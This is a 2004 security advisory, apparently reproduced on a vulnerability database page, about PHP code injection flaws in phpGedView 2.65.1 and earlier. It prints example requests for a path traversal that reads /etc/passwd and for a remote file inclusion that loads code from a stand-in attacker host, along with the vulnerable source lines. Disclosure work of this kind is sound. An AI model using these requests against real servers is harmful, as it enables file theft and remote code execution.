Vulners
Lucene search
phpGedView_v2.txt
`-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior
################################################################################
Summary :
phpGedView is an open source system for online viewing Gedcom information
(family tree and genology information). Multiple PHP Code Injection
vulnerabilities exist in the phpGedView product. They enable a malicious user
to access arbitrary files or execute commands on the server.
################################################################################
Details :
Multiple PHP scripts can be exploited to perform PHP Code Injection.
Vulnerable Systems:
* phpGedView version 2.65.1 and prior
Release Date :
January 30, 2004
Severity :
HIGH
################################################################################
Examples :
-------------------------------------------
I - PHP Injection or arbitrary file access
(HIGH Risk BUT user must be Admin)
- -- HTTP Request --
http://[target]/[phpGedView-directory]/editconfig_gedcom.php?gedcom_config=../../../../../../etc/passwd
or
http://[target]/[phpGedView-directory]/editconfig_gedcom.php
POSTDATA: gedcom_config=../../../../../../etc/passwd
- -- HTTP Request --
Code impacted : editconfig_gedcom.php
61:if (empty($gedcom_config)) {
62: if (!empty($_POST["gedcom_config"])) $gedcom_config = $_POST["gedcom_config"];
63: else $gedcom_config = "config_gedcom.php";
64:}
65:
66:require($gedcom_config);
The both GET/POST requets will work evenif PHP register_globals is Off.
-------------------------------------------
II - PHP Injection
(HIGH Risk no authentication needed)
- -- HTTP Request --
http://[target]/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://attacker&THEME_DIR=/
- -- HTTP Request --
Code impacted : [GED_File]_conf.php
123:if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php")) require($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php");
124:else {
125: $THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/";
126: require($THEME_DIR."theme.php");
127: }
The require call is only vulnerable when PHP register_globals is On.
In this case you have to obtain the name of the GEDCOM File used. Just perform
a http://[target]/session.php request the GEDCOM file will be in argument of the
login.php call.
The attacker has to create on his web site a directory call themes/standard, and
a file theme.php
For example: theme.php = <?php print "<?php phpinfo();?>" ;?>
and the request, will execute the phpinfo() command on the vulnerable target.
################################################################################
Vendor Status :
The information has been provided to John Finlay the PhpGedView Project Manager.
A new release 2.65.2 with fixes for these vulnerabilities is available.
- --> http://phpgedview.sourceforge.net/
- --> http://sourceforge.net/project/showfiles.php?group_id=55456&package_id=61562&release_id=141517
################################################################################
Credit :
Cedric Cochin, Security Engineer, netVigilance, inc.
< [email protected] >
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQFAGZbZA9/8vqmWoYQRAmVrAJ9rd9L6WkO5FV9ufaMYj5mhk0uMXwCePwxS
+hdjG8/IGk+yoZje7W1I110=
=Gfdz
-----END PGP SIGNATURE-----
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Jan 2004 00:00Current
7.4High risk
Vulners AI Score7.4